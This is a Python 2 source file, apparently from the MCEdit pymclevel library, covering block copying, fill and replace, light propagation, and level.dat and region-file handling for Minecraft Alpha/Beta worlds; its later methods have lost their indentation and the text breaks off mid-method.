        """ copy blocks between two infinite levels by looping through the
        destination's chunks. make a sub-box of the source level for each chunk
        and copy block and entities in the sub box to the dest chunk."""

        #assumes destination point and bounds have already been checked.
        destBox = BoundingBox(destinationPoint, sourceBox.size)
        chunkCount = destBox.chunkCount
        i = 0
        sourceMask = self.sourceMaskFunc(blocksToCopy)

        def subbox(slices, point):
            # translate a destination-chunk slice back into source coordinates
            size = [s.stop - s.start for s in slices]
            size[1], size[2] = size[2], size[1]

            return BoundingBox([p + a for p, a in zip(point, sourceBox.origin)], size)

        def shouldCreateFunc(slices, point):
            # only create the dest chunk when the source has any chunk there
            box = subbox(slices, point)
            b = any(list(sourceLevel.containsChunk(*c) for c in box.chunkPositions)) #any() won't take a generator-expression :(
            #if b == False:
            #    print 'Skipped ', list(box.chunkPositions)
            return b

        for cPos, slices, point in self._getSlices(destBox):
            if not self.containsChunk(*cPos):
                if shouldCreateFunc(slices, point):
                    self.createChunk(*cPos)
                else:
                    continue
            chunk = self.getChunk(*cPos)

            i += 1
            yield (i, chunkCount)
            if i % 100 == 0:
                info("Chunk {0}...".format(i))

            dstblocks = chunk.Blocks[slices]
            dstdata = chunk.Data[slices]
            sourceSubBox = subbox(slices, point)
            for srcchunk, srcslices, srcpoint in sourceLevel.getChunkSlices(sourceSubBox):
                # source points come back as (x, z, y); reorder to (x, y, z)
                srcpoint = srcpoint[0], srcpoint[2], srcpoint[1]
                sourceBlocks = srcchunk.Blocks[srcslices]
                sourceData = srcchunk.Data[srcslices]
                mask = sourceMask(sourceBlocks)
                convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)

                dstslices = [slice(p, p + (s.stop - s.start)) for p, s in zip(srcpoint, srcslices)]
                dstblocks[dstslices][mask] = convertedSourceBlocks[mask]
                if convertedSourceData is not None:
                    dstdata[dstslices][mask] = convertedSourceData[mask]

            chunk.chunkChanged()

    def copyBlocksFrom(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
        """Blocking wrapper: run copyBlocksFromIter to completion."""
        return exhaust(self.copyBlocksFromIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, entities, create))

    def copyBlocksFromIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
        """Copy blocks (and optionally entities) from sourceLevel into this
        level, dispatching to the finite or infinite strategy. Yields
        progress tuples from the underlying iterators."""
        (x, y, z) = destinationPoint;
        (lx, ly, lz) = sourceBox.size
        #sourcePoint, sourcePoint1 = sourceBox

        sourceBox, destinationPoint = self.adjustCopyParameters(sourceLevel, sourceBox, destinationPoint)
        #needs work xxx
        info(u"Copying {0} blocks from {1} to {2}" .format (ly * lz * lx, sourceBox, destinationPoint))
        startTime = datetime.now()

        if not sourceLevel.isInfinite:
            for i in self.copyBlocksFromFiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
                yield i

        else:
            for i in self.copyBlocksFromInfiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
                yield i

        for i in self.copyEntitiesFromIter(sourceLevel, sourceBox, destinationPoint, entities):
            yield i
        info("Duration: {0}".format(datetime.now() - startTime))
        #self.saveInPlace()

    def fillBlocks(self, box, blockInfo, blocksToReplace=[]):
        """Blocking wrapper: run fillBlocksIter to completion."""
        # NOTE: mutable default argument is shared across calls; it is only
        # read here, never mutated.
        return exhaust(self.fillBlocksIter(box, blockInfo, blocksToReplace))

    def fillBlocksIter(self, box, blockInfo, blocksToReplace=[]):
        """Fill *box* (the whole level when box is None) with blockInfo,
        optionally replacing only the blocks listed in blocksToReplace.
        Yields (chunksDone, chunkCount) progress tuples."""
        if box is None:
            chunkIterator = self.getAllChunkSlices()
            box = self.bounds
        else:
            chunkIterator = self.getChunkSlices(box)

        #shouldRetainData = (not blockInfo.hasVariants and not any([b.hasVariants for b in blocksToReplace]))
        #if shouldRetainData:
        #    info( "Preserving data bytes" )
        shouldRetainData = False #xxx old behavior overwrote blockdata with 0 when e.g. replacing water with lava

        info("Replacing {0} with {1}".format(blocksToReplace, blockInfo))

        changesLighting = True

        if len(blocksToReplace):
            blocktable = self.blockReplaceTable(blocksToReplace)
            shouldRetainData = all([blockrotation.SameRotationType(blockInfo, b) for b in blocksToReplace])

            # relighting can be skipped only if the replacement changes
            # neither light absorption nor light emission
            newAbsorption = self.materials.lightAbsorption[blockInfo.ID]
            oldAbsorptions = [self.materials.lightAbsorption[b.ID] for b in blocksToReplace]
            changesLighting = False
            for a in oldAbsorptions:
                if a != newAbsorption: changesLighting = True;

            newEmission = self.materials.lightEmission[blockInfo.ID]
            oldEmissions = [self.materials.lightEmission[b.ID] for b in blocksToReplace]
            for a in oldEmissions:
                if a != newEmission: changesLighting = True;

        i = 0;
        skipped = 0
        replaced = 0;

        for (chunk, slices, point) in chunkIterator:
            i += 1;
            if i % 100 == 0:
                info(u"Chunk {0}...".format(i))
            yield i, box.chunkCount

            blocks = chunk.Blocks[slices]
            data = chunk.Data[slices]
            mask = slice(None)

            needsLighting = changesLighting;

            if len(blocksToReplace):
                mask = blocktable[blocks, data]

                blockCount = mask.sum()
                replaced += blockCount;

                #don't waste time relighting and copying if the mask is empty
                if blockCount:
                    blocks[:][mask] = blockInfo.ID
                    if not shouldRetainData:
                        data[mask] = blockInfo.blockData
                else:
                    skipped += 1;
                    needsLighting = False;

                def include(tileEntity):
                    # drop tile entities whose block was just replaced
                    p = TileEntity.pos(tileEntity)
                    x, y, z = map(lambda a, b, c:(a - b) - c, p, point, box.origin)
                    return not ((p in box) and mask[x, z, y])

                chunk.TileEntities.value[:] = filter(include, chunk.TileEntities)

            else:
                blocks[:] = blockInfo.ID
                if not shouldRetainData:
                    data[:] = blockInfo.blockData
                chunk.removeTileEntitiesInBox(box)

            chunk.chunkChanged(needsLighting);

        if len(blocksToReplace):
            info(u"Replace: Skipped {0} chunks, replaced {1} blocks".format(skipped, replaced))

    def generateLights(self, dirtyChunks=None):
        """Blocking wrapper: run generateLightsIter to completion."""
        return exhaust(self.generateLightsIter(dirtyChunks))

    def _getChunkUnloaded(self, cx, cz):
        # Hook for subclasses that can fetch a chunk without fully loading it.
        return self.getChunk(cx, cz)

    def generateLightsIter(self, dirtyChunks=None):
        """ dirtyChunks may be an iterable yielding (xPos,zPos) tuples
        if none, generate lights for all chunks that need lighting
        """

        startTime = datetime.now();

        if dirtyChunks is None:
            dirtyChunks = (ch for ch in self._loadedChunks.itervalues() if ch.needsLighting)
        else:
            dirtyChunks = (self._getChunkUnloaded(*c) for c in dirtyChunks if self.containsChunk(*c))

        dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)

        #at 150k per loaded chunk,
        maxLightingChunks = 4000

        info(u"Asked to light {0} chunks".format(len(dirtyChunks)))
        chunkLists = [dirtyChunks];

        def reverseChunkPosition(x):
            cx, cz = x.chunkPosition;
            return cz, cx

        def splitChunkLists(chunkLists):
            # quarter each list spatially to keep per-batch memory bounded
            newChunkLists = []
            for l in chunkLists:

                #list is already sorted on x position, so this splits into left and right

                smallX = l[:len(l) / 2]
                bigX = l[len(l) / 2:]

                #sort halves on z position
                smallX = sorted(smallX, key=reverseChunkPosition)
                bigX = sorted(bigX, key=reverseChunkPosition)

                #add quarters to list

                newChunkLists.append(smallX[:len(smallX) / 2])
                newChunkLists.append(smallX[len(smallX) / 2:])

                newChunkLists.append(bigX[:len(bigX) / 2])
                newChunkLists.append(bigX[len(bigX) / 2:])

            return newChunkLists

        while len(chunkLists[0]) > maxLightingChunks:
            chunkLists = splitChunkLists(chunkLists);

        if len(chunkLists) > 1:
            info(u"Using {0} batches to conserve memory.".format(len(chunkLists)))

        #batchSize = min(len(a) for a in chunkLists)

        estimatedTotals = [len(a) * 32 for a in chunkLists]
        workDone = 0

        for i, dc in enumerate(chunkLists):
            info(u"Batch {0}/{1}".format(i, len(chunkLists)))

            dc = sorted(dc, key=lambda x:x.chunkPosition)

            workTotal = sum(estimatedTotals)
            t = 0
            for c, t, p in self._generateLightsIter(dc):
                yield c + workDone, t + workTotal - estimatedTotals[i], p

            # replace the estimate with the actual work reported by the batch
            estimatedTotals[i] = t
            workDone += t

            for ch in dc:
                ch.compress();

        timeDelta = datetime.now() - startTime;

        if len(dirtyChunks):
            info(u"Completed in {0}, {1} per chunk".format(timeDelta, dirtyChunks and timeDelta / len(dirtyChunks) or 0))

        return;

    def _generateLightsIter(self, dirtyChunks):
        """Relight one batch of chunks: reset emitted light, then propagate
        BlockLight (and SkyLight outside the Nether/End) outward in up to 14
        passes. Yields (workDone, workTotal, progressInfo) tuples."""
        conserveMemory = False
        la = array(self.materials.lightAbsorption)
        clip(la, 1, 15, la)

        dirtyChunks = set(dirtyChunks)

        workDone = 0
        workTotal = len(dirtyChunks) * 29

        progressInfo = (u"Lighting {0} chunks".format(len(dirtyChunks)))
        info(progressInfo)

        for i, chunk in enumerate(dirtyChunks):
            try:
                chunk.load();
            except (ChunkNotPresent, ChunkMalformed):
                continue;
            chunk.chunkChanged();

            yield i, workTotal, progressInfo

            assert chunk.dirty and chunk.needsLighting

        workDone += len(dirtyChunks)
        workTotal = len(dirtyChunks)

        for ch in list(dirtyChunks):
            #relight all blocks in neighboring chunks in case their light source disappeared.
            cx, cz = ch.chunkPosition
            for dx, dz in itertools.product((-1, 0, 1), (-1, 0, 1)):
                try:
                    ch = self.getChunk (cx + dx, cz + dz)
                except (ChunkNotPresent, ChunkMalformed):
                    continue
                dirtyChunks.add(ch);

        dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
        workTotal += len(dirtyChunks) * 28

        # seed BlockLight with each block's own light emission
        for i, chunk in enumerate(dirtyChunks):
            chunk.BlockLight[:] = self.materials.lightEmission[chunk.Blocks];
            chunk.dirty = True
            if conserveMemory:
                chunk.compress();

        # stand-in for missing neighbors: all-dark, absorbs without emitting
        zeroChunk = ZeroChunk(self.Height)
        zeroChunk.BlockLight[:] = 0;
        zeroChunk.SkyLight[:] = 0;

        startingDirtyChunks = dirtyChunks

        # scratch buffers for change detection between passes
        oldLeftEdge = zeros((1, 16, self.Height), 'uint8');
        oldBottomEdge = zeros((16, 1, self.Height), 'uint8');
        oldChunk = zeros((16, 16, self.Height), 'uint8');

        if self.dimNo in (-1, 1):
            # Nether and The End have no sky light
            lights = ("BlockLight",)
        else:
            lights = ("BlockLight", "SkyLight")
        info(u"Dispersing light...")

        def clipLight(light):
            #light arrays are all uint8 by default, so when results go negative
            #they become large instead. reinterpret as signed int using view()
            #and then clip to range
            light.view('int8').clip(0, 15, light)

        for j, light in enumerate(lights):
            zerochunkLight = getattr(zeroChunk, light);
            newDirtyChunks = list(startingDirtyChunks);

            work = 0

            for i in range(14):
                if len(newDirtyChunks) == 0:
                    workTotal -= len(startingDirtyChunks) * (14 - i)
                    break

                progressInfo = u"{0} Pass {1}: {2} chunks".format(light, i, len(newDirtyChunks))
                info(progressInfo)

                """
                propagate light!
                for each of the six cardinal directions, figure a new light value for
                adjoining blocks by reducing this chunk's light by light absorption and fall off.
                compare this new light value against the old light value and update with the maximum.

                we calculate all chunks one step before moving to the next step, to ensure all gaps at chunk edges are filled.
                we do an extra cycle because lights sent across edges may lag by one cycle.

                xxx this can be optimized by finding the highest and lowest blocks
                that changed after one pass, and only calculating changes for that
                vertical slice on the next pass. newDirtyChunks would have to be a
                list of (cPos, miny, maxy) tuples or a cPos : (miny, maxy) dict
                """

                newDirtyChunks = set(newDirtyChunks)
                newDirtyChunks.discard(zeroChunk)

                dirtyChunks = sorted(newDirtyChunks, key=lambda x:x.chunkPosition)

                newDirtyChunks = list();

                for chunk in dirtyChunks:
                    (cx, cz) = chunk.chunkPosition
                    neighboringChunks = {};
                    try:
                        chunk.load();
                    except (ChunkNotPresent, ChunkMalformed), e:
                        print "Chunk error during relight, chunk skipped: ", e
                        continue;

                    for dir, dx, dz in ((FaceXDecreasing, -1, 0),
                                        (FaceXIncreasing, 1, 0),
                                        (FaceZDecreasing, 0, -1),
                                        (FaceZIncreasing, 0, 1)):
                        try:
                            neighboringChunks[dir] = self.getChunk(cx + dx, cz + dz)
                        except (ChunkNotPresent, ChunkMalformed):
                            neighboringChunks[dir] = zeroChunk;

                    chunkLa = la[chunk.Blocks];
                    chunkLight = getattr(chunk, light);
                    oldChunk[:] = chunkLight[:]

                    ### Spread light toward -X

                    nc = neighboringChunks[FaceXDecreasing]
                    ncLight = getattr(nc, light);
                    oldLeftEdge[:] = ncLight[15:16, :, 0:self.Height] #save the old left edge

                    #left edge
                    newlight = (chunkLight[0:1, :, :self.Height] - la[nc.Blocks[15:16, :, 0:self.Height]])
                    clipLight(newlight)

                    maximum(ncLight[15:16, :, 0:self.Height], newlight, ncLight[15:16, :, 0:self.Height])

                    #chunk body
                    newlight = (chunkLight[1:16, :, 0:self.Height] - chunkLa[0:15, :, 0:self.Height])
                    clipLight(newlight)

                    maximum(chunkLight[0:15, :, 0:self.Height], newlight, chunkLight[0:15, :, 0:self.Height])

                    #right edge
                    nc = neighboringChunks[FaceXIncreasing]
                    ncLight = getattr(nc, light);

                    newlight = ncLight[0:1, :, :self.Height] - chunkLa[15:16, :, 0:self.Height]
                    clipLight(newlight)

                    maximum(chunkLight[15:16, :, 0:self.Height], newlight, chunkLight[15:16, :, 0:self.Height])

                    ### Spread light toward +X

                    #right edge
                    nc = neighboringChunks[FaceXIncreasing]
                    ncLight = getattr(nc, light);

                    newlight = (chunkLight[15:16, :, 0:self.Height] - la[nc.Blocks[0:1, :, 0:self.Height]])
                    clipLight(newlight)

                    maximum(ncLight[0:1, :, 0:self.Height], newlight, ncLight[0:1, :, 0:self.Height])

                    #chunk body
                    newlight = (chunkLight[0:15, :, 0:self.Height] - chunkLa[1:16, :, 0:self.Height])
                    clipLight(newlight)

                    maximum(chunkLight[1:16, :, 0:self.Height], newlight, chunkLight[1:16, :, 0:self.Height])

                    #left edge
                    nc = neighboringChunks[FaceXDecreasing]
                    ncLight = getattr(nc, light);

                    newlight = ncLight[15:16, :, :self.Height] - chunkLa[0:1, :, 0:self.Height]
                    clipLight(newlight)

                    maximum(chunkLight[0:1, :, 0:self.Height], newlight, chunkLight[0:1, :, 0:self.Height])

                    zerochunkLight[:] = 0; #zero the zero chunk after each direction
                    # so the lights it absorbed don't affect the next pass

                    #check if the left edge changed and dirty or compress the chunk appropriately
                    if (oldLeftEdge != ncLight[15:16, :, :self.Height]).any():
                        #chunk is dirty
                        newDirtyChunks.append(nc)

                    ### Spread light toward -Z

                    #bottom edge
                    nc = neighboringChunks[FaceZDecreasing]
                    ncLight = getattr(nc, light);
                    oldBottomEdge[:] = ncLight[:, 15:16, :self.Height] # save the old bottom edge

                    newlight = (chunkLight[:, 0:1, :self.Height] - la[nc.Blocks[:, 15:16, :self.Height]])
                    clipLight(newlight)

                    maximum(ncLight[:, 15:16, :self.Height], newlight, ncLight[:, 15:16, :self.Height])

                    #chunk body
                    newlight = (chunkLight[:, 1:16, :self.Height] - chunkLa[:, 0:15, :self.Height])
                    clipLight(newlight)

                    maximum(chunkLight[:, 0:15, :self.Height], newlight, chunkLight[:, 0:15, :self.Height])

                    #top edge
                    nc = neighboringChunks[FaceZIncreasing]
                    ncLight = getattr(nc, light);

                    newlight = ncLight[:, 0:1, :self.Height] - chunkLa[:, 15:16, 0:self.Height]
                    clipLight(newlight)

                    maximum(chunkLight[:, 15:16, 0:self.Height], newlight, chunkLight[:, 15:16, 0:self.Height])

                    ### Spread light toward +Z

                    #top edge
                    nc = neighboringChunks[FaceZIncreasing]
                    ncLight = getattr(nc, light);

                    newlight = (chunkLight[:, 15:16, :self.Height] - la[nc.Blocks[:, 0:1, :self.Height]])
                    clipLight(newlight)

                    maximum(ncLight[:, 0:1, :self.Height], newlight, ncLight[:, 0:1, :self.Height])

                    #chunk body
                    newlight = (chunkLight[:, 0:15, :self.Height] - chunkLa[:, 1:16, :self.Height])
                    clipLight(newlight)

                    maximum(chunkLight[:, 1:16, :self.Height], newlight, chunkLight[:, 1:16, :self.Height])

                    #bottom edge
                    nc = neighboringChunks[FaceZDecreasing]
                    ncLight = getattr(nc, light);

                    newlight = ncLight[:, 15:16, :self.Height] - chunkLa[:, 0:1, 0:self.Height]
                    clipLight(newlight)

                    maximum(chunkLight[:, 0:1, 0:self.Height], newlight, chunkLight[:, 0:1, 0:self.Height])

                    zerochunkLight[:] = 0;

                    if (oldBottomEdge != ncLight[:, 15:16, :self.Height]).any():
                        newDirtyChunks.append(nc)

                    # vertical spread stays within the chunk: downward...
                    newlight = (chunkLight[:, :, 0:self.Height - 1] - chunkLa[:, :, 1:self.Height])
                    clipLight(newlight)
                    maximum(chunkLight[:, :, 1:self.Height], newlight, chunkLight[:, :, 1:self.Height])

                    # ...and upward
                    newlight = (chunkLight[:, :, 1:self.Height] - chunkLa[:, :, 0:self.Height - 1])
                    clipLight(newlight)
                    maximum(chunkLight[:, :, 0:self.Height - 1], newlight, chunkLight[:, :, 0:self.Height - 1])

                    if (oldChunk != chunkLight).any():
                        newDirtyChunks.append(chunk);

                    work += 1
                    yield workDone + work, workTotal, progressInfo

                workDone += work
                workTotal -= len(startingDirtyChunks)
                workTotal += work

                work = 0

        for ch in startingDirtyChunks:
            ch.needsLighting = False;
class MCInfdevOldLevel(ChunkedLevelMixin, EntityLevel):
    """A Minecraft Alpha/Beta "infinite" world on disk: a folder holding a
    level.dat, region files, player data, and optional DIM* dimensions."""
    materials = alphaMaterials;
    isInfinite = True
    parentWorld = None;  # set on dimensions; None for the overworld itself
    dimNo = 0;  # 0 = overworld; -1/1 are used for Nether/End dimensions
    Height = 128
@property
def displayName(self):
#shortname = os.path.basename(self.filename);
#if shortname == "level.dat":
shortname = os.path.basename(os.path.dirname(self.filename))
return shortname
@classmethod
def _isLevel(cls, filename):
join = os.path.join
exists = os.path.exists
if exists(join(filename, "chunks.dat")): return False # exclude Pocket Edition folders
if not os.path.isdir(filename):
f = os.path.basename(filename)
if f not in ("level.dat", "level.dat_old"): return False
filename = os.path.dirname(filename)
files = os.listdir(filename);
if "level.dat" in files or "level.dat_old" in files:
return True;
return False
def getWorldBounds(self):
if self.chunkCount == 0:
return BoundingBox((0, 0, 0), (0, 0, 0))
allChunksArray = array(list(self.allChunks), dtype='int32')
mincx = min(allChunksArray[:, 0])
maxcx = max(allChunksArray[:, 0])
mincz = min(allChunksArray[:, 1])
maxcz = max(allChunksArray[:, 1])
origin = (mincx << 4, 0, mincz << 4)
size = ((maxcx - mincx + 1) << 4, self.Height, (maxcz - mincz + 1) << 4)
return BoundingBox(origin, size)
def __str__(self):
return "MCInfdevOldLevel(\"" + os.path.split(self.worldDir)[1] + "\")"
def TagProperty(tagName, tagType, defaultValueFunc=lambda self:None):
def getter(self):
if tagName not in self.root_tag[Data]:
self.root_tag[Data][tagName] = tagType(defaultValueFunc(self))
return self.root_tag[Data][tagName].value
def setter(self, val):
self.root_tag[Data][tagName] = tagType(value=val)
return property(getter, setter)
SizeOnDisk = TagProperty('SizeOnDisk', TAG_Long)
RandomSeed = TagProperty('RandomSeed', TAG_Long)
Time = TagProperty('Time', TAG_Long); """ Age of the world in ticks. 20 ticks per second; 24000 ticks per day."""
LastPlayed = TagProperty('LastPlayed', TAG_Long, lambda self:long(time.time() * 1000))
LevelName = TagProperty('LevelName', TAG_String, lambda self:self.displayName)
MapFeatures = TagProperty('MapFeatures', TAG_Byte, lambda self:1)
GameType = TagProperty('GameType', TAG_Int, lambda self:0) #0 for survival, 1 for creative
GAMETYPE_SURVIVAL = 0
GAMETYPE_CREATIVE = 1
_bounds = None
@property
def bounds(self):
if self._bounds is None: self._bounds = self.getWorldBounds();
return self._bounds
    @property
    def size(self):
        """Size of the world's bounding box (width, height, length)."""
        return self.bounds.size
def close(self):
for rf in (self.regionFiles or {}).values():
rf.close();
self.regionFiles = {}
self._allChunks = None
self._loadedChunks = {}
def create(self, filename, random_seed, last_played):
if filename == None:
raise ValueError, "Can't create an Infinite level without a filename!"
#create a new level
root_tag = TAG_Compound();
root_tag[Data] = TAG_Compound();
root_tag[Data][SpawnX] = TAG_Int(0)
root_tag[Data][SpawnY] = TAG_Int(2)
root_tag[Data][SpawnZ] = TAG_Int(0)
if last_played is None:
last_played = long(time.time() * 1000)
if random_seed is None:
random_seed = long(random.random() * 0xffffffffffffffffL) - 0x8000000000000000L
self.root_tag = root_tag;
root_tag[Data]['version'] = TAG_Int(19132)
self.LastPlayed = long(last_played)
self.RandomSeed = long(random_seed)
self.SizeOnDisk = 0
self.Time = 1
self.LevelName = os.path.basename(self.worldDir)
### if singleplayer:
self.createPlayer("Player")
if not os.path.exists(self.worldDir):
os.mkdir(self.worldDir)
    def createPlayer(self, playerName):
        """Create a default player tag: full health, empty inventory, standing
        at (0.5, 2.8, 0.5). "Player" goes under root_tag[Data]; other names
        are built standalone and written to the players folder."""
        if playerName == "Player":
            playerTag = self.root_tag[Data].setdefault(playerName, TAG_Compound())
        else:
            playerTag = TAG_Compound()

        playerTag['Air'] = TAG_Short(300);
        playerTag['AttackTime'] = TAG_Short(0)
        playerTag['DeathTime'] = TAG_Short(0);
        playerTag['Fire'] = TAG_Short(-20);
        playerTag['Health'] = TAG_Short(20);
        playerTag['HurtTime'] = TAG_Short(0);
        playerTag['Score'] = TAG_Int(0);
        playerTag['FallDistance'] = TAG_Float(0)
        playerTag['OnGround'] = TAG_Byte(0)

        playerTag['Inventory'] = TAG_List()

        playerTag['Motion'] = TAG_List([TAG_Double(0) for i in range(3)])
        playerTag['Pos'] = TAG_List([TAG_Double([0.5, 2.8, 0.5][i]) for i in range(3)])
        playerTag['Rotation'] = TAG_List([TAG_Float(0), TAG_Float(0)])

        if playerName != "Player":
            # NOTE(review): playerTagCache is initialized as a plain dict in
            # __init__ and dicts have no .save -- confirm this branch is ever
            # exercised, and that playerTag is meant to be stored in the cache.
            self.playerTagCache.save(self.getPlayerPath(playerName))
    def __init__(self, filename=None, create=False, random_seed=None, last_played=None):
        """
        Load an Alpha level from the given filename. It can point to either
        a level.dat or a folder containing one. If create is True, it will
        also create the world using the random_seed and last_played arguments.
        If they are none, a random 64-bit seed will be selected for RandomSeed
        and long(time.time()*1000) will be used for LastPlayed.

        If you try to create an existing world, its level.dat will be replaced.
        """
        self.Length = 0
        self.Width = 0
        self.Height = 128 #subject to change?
        self.playerTagCache = {}
        self.players = []

        if not os.path.exists(filename):
            if not create:
                raise IOError, 'File not found'

            self.worldDir = filename
            os.mkdir(self.worldDir)

        # resolve filename to the world folder, whether it names the folder
        # itself or a level.dat/level.dat_old within it
        if os.path.isdir(filename):
            self.worldDir = filename
        else:
            if os.path.basename(filename) in ("level.dat", "level.dat_old"):
                self.worldDir = os.path.dirname(filename)
            else:
                raise IOError, 'File is not a Minecraft Alpha world'

        self.filename = os.path.join(self.worldDir, "level.dat")
        self.regionDir = os.path.join(self.worldDir, "region")
        if not os.path.exists(self.regionDir):
            os.mkdir(self.regionDir)

        #maps (cx,cz) pairs to InfdevChunks
        self._loadedChunks = {}
        self._allChunks = None
        self.dimensions = {};
        self.regionFiles = {}

        #used to limit memory usage
        self.loadedChunkQueue = dequeset()
        self.decompressedChunkQueue = dequeset()

        self.loadLevelDat(create, random_seed, last_played);

        #attempt to support yMod
        try:
            self.Height = self.root_tag["Data"]["YLimit"].value
        except:
            pass

        # discover on-disk player files plus the embedded singleplayer tag
        self.playersDir = os.path.join(self.worldDir, "players");

        if os.path.isdir(self.playersDir):
            self.players = [x[:-4] for x in os.listdir(self.playersDir) if x.endswith(".dat")]
        if "Player" in self.root_tag["Data"]:
            self.players.append("Player")

        self.preloadDimensions();
        #self.preloadChunkPositions();
def __del__(self):
    # Delegate cleanup to close() when the level object is garbage-collected.
    self.close()
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
    """Load (or create) level.dat into self.root_tag.

    Fallback chain on load failure: level.dat -> level.dat_old backup ->
    create a fresh level.dat with defaults.
    """
    if create:
        self.create(self.filename, random_seed, last_played);
        self.saveInPlace();
    else:
        try:
            self.root_tag = nbt.load(self.filename)
        except Exception, e:
            filename_old = os.path.join(self.worldDir, "level.dat_old")
            info("Error loading level.dat, trying level.dat_old ({0})".format(e))
            try:
                self.root_tag = nbt.load(filename_old)
                info("level.dat restored from backup.")
                # persist the restored backup as the new level.dat
                self.saveInPlace();
            except Exception, e:
                traceback.print_exc()
                print repr(e)
                info("Error loading level.dat_old. Initializing with defaults.");
                self.create(self.filename, random_seed, last_played);
def preloadDimensions(self):
    """Discover DIM* subfolders (Nether, The End, ...) and load each as
    an MCAlphaDimension keyed by its dimension number."""
    worldDirs = os.listdir(self.worldDir);
    for dirname in worldDirs :
        if dirname.startswith("DIM"):
            try:
                # folder name is "DIM" + signed dimension number, e.g. DIM-1
                dimNo = int(dirname[3:]);
                info("Found dimension {0}".format(dirname))
                dim = MCAlphaDimension(self, dimNo);
                self.dimensions[dimNo] = dim;
            except Exception, e:
                # a malformed DIM folder should not prevent the world loading
                error(u"Error loading dimension {0}: {1}".format(dirname, e))
def getDimension(self, dimNo):
    """Return the dimension level for dimNo, creating it on demand.

    Dimension 0 is the overworld (this level itself). Requests made on a
    non-overworld dimension are forwarded to the parent world so there is
    a single dimension table.
    NOTE(review): assumes self.dimNo is 0 for a top-level world -- it is
    set in MCAlphaDimension.__init__ but not visibly in this class; confirm.
    """
    if self.dimNo != 0:
        return self.parentWorld.getDimension(dimNo)
    if dimNo == 0:
        return self
    if dimNo in self.dimensions: return self.dimensions[dimNo]
    dim = MCAlphaDimension(self, dimNo, create=True)
    self.dimensions[dimNo] = dim
    return dim
def getRegionForChunk(self, cx, cz):
    """Return the region file owning chunk (cx, cz); each region holds a
    32x32 block of chunks, so region coords are the chunk coords >> 5."""
    return self.getRegionFile(cx >> 5, cz >> 5)
def preloadChunkPositions(self):
    """Populate _allChunks using whichever on-disk layout this world uses."""
    # Level version 19132 means region (.mcr) storage; anything else is the
    # older one-file-per-chunk layout.
    if self.version != 19132:
        self.preloadChunkPaths()
    else:
        self.preloadRegions()
def findRegionFiles(self):
    """Yield the full path of every file in the world's region folder,
    creating the folder first if it does not exist.

    This is a generator: the folder check runs lazily, on first iteration.
    """
    folder = os.path.join(self.worldDir, "region")
    if not os.path.exists(folder):
        os.mkdir(folder)
    for entry in os.listdir(folder):
        yield os.path.join(folder, entry)
def loadRegionFile(self, filepath):
    """Open filepath as a region file if its name matches r.<rx>.<rz>.mcr;
    return an MCRegionFile, or None for any non-region filename."""
    filename = os.path.basename(filepath)
    bits = filename.split('.')
    # expect exactly: 'r', <rx>, <rz>, 'mcr'
    if len(bits) < 4 or bits[0] != 'r' or bits[3] != "mcr": return None
    try:
        rx, rz = map(int, bits[1:3])
    except ValueError:
        # region coordinates were not integers
        return None
    return MCRegionFile(filepath, (rx, rz))
def getRegionFile(self, rx, rz):
    """Return the (cached) MCRegionFile for region (rx, rz), opening and
    caching it on first access."""
    regionFile = self.regionFiles.get((rx, rz))
    if regionFile: return regionFile
    regionFile = MCRegionFile(self.regionFilename(rx, rz), (rx, rz))
    self.regionFiles[rx, rz] = regionFile;
    return regionFile
def unloadRegions(self):
    # Alias for close(): releases all open region files.
    self.close()
def preloadRegions(self):
    """Scan every region file and record each allocated chunk position in
    self._allChunks. Empty region files are deleted from disk."""
    info(u"Scanning for regions...")
    self._allChunks = set()
    for filepath in self.findRegionFiles():
        regionFile = self.loadRegionFile(filepath)
        if regionFile is None: continue
        if regionFile.offsets.any():
            rx, rz = regionFile.regionCoords
            self.regionFiles[rx, rz] = regionFile
            # a nonzero offset means the chunk slot is allocated
            for index, offset in enumerate(regionFile.offsets):
                if offset:
                    # offsets are indexed cz*32 + cx within the region
                    cx = index & 0x1f
                    cz = index >> 5
                    # convert region-local to absolute chunk coordinates
                    cx += rx << 5
                    cz += rz << 5
                    self._allChunks.add((cx, cz))
        else:
            info(u"Removing empty region file {0}".format(filepath))
            regionFile.close()
            os.unlink(regionFile.path)
def preloadChunkPaths(self):
    """Scan the pre-region chunk layout (<hash>/<hash>/c.<x>.<z>.dat files)
    and record every chunk position in self._allChunks."""
    info(u"Scanning for chunks...")
    worldDirs = os.listdir(self.worldDir);
    self._allChunks = set()
    for dirname in worldDirs:
        # only base36 hash folders can contain chunk files
        if(dirname in self.dirhashes):
            subdirs = os.listdir(os.path.join(self.worldDir, dirname));
            for subdirname in subdirs:
                if(subdirname in self.dirhashes):
                    filenames = os.listdir(os.path.join(self.worldDir, dirname, subdirname));
                    # keep names of the exact form c.<x>.<z>.dat
                    bits = map(lambda x:x.split('.'), filenames);
                    chunkfilenames = filter(lambda x:(len(x) == 4 and x[0].lower() == 'c' and x[3].lower() == 'dat'), bits)
                    for c in chunkfilenames:
                        try:
                            # x and z components are base36-encoded
                            cx, cz = (decbase36(c[1]), decbase36(c[2]))
                        except Exception, e:
                            info(u'Skipped file {0} ({1})'.format(u'.'.join(c), e))
                            continue
                        self._allChunks.add((cx, cz))
    info(u"Found {0} chunks.".format(len(self._allChunks)))
def compress(self):
    # Convenience alias: compress every loaded chunk.
    self.compressAllChunks();
def compressAllChunks(self):
    # Re-compress every loaded chunk to reclaim memory.
    for ch in self._loadedChunks.itervalues():
        ch.compress();
def compressChunk(self, cx, cz):
    # Compress a single chunk; silently ignores chunks that are not loaded.
    if not (cx, cz) in self._loadedChunks: return; #not an error
    self._loadedChunks[cx, cz].compress()
# Memory-usage caps enforced by chunkDidDecompress / chunkDidLoad:
# oldest entries beyond these limits are compressed or unloaded.
decompressedChunkLimit = 2048 # about 320 megabytes
loadedChunkLimit = 8192 # from 8mb to 800mb depending on chunk contents
def chunkDidCompress(self, chunk):
    # Callback from InfdevChunk.compress(): drop it from the decompressed queue.
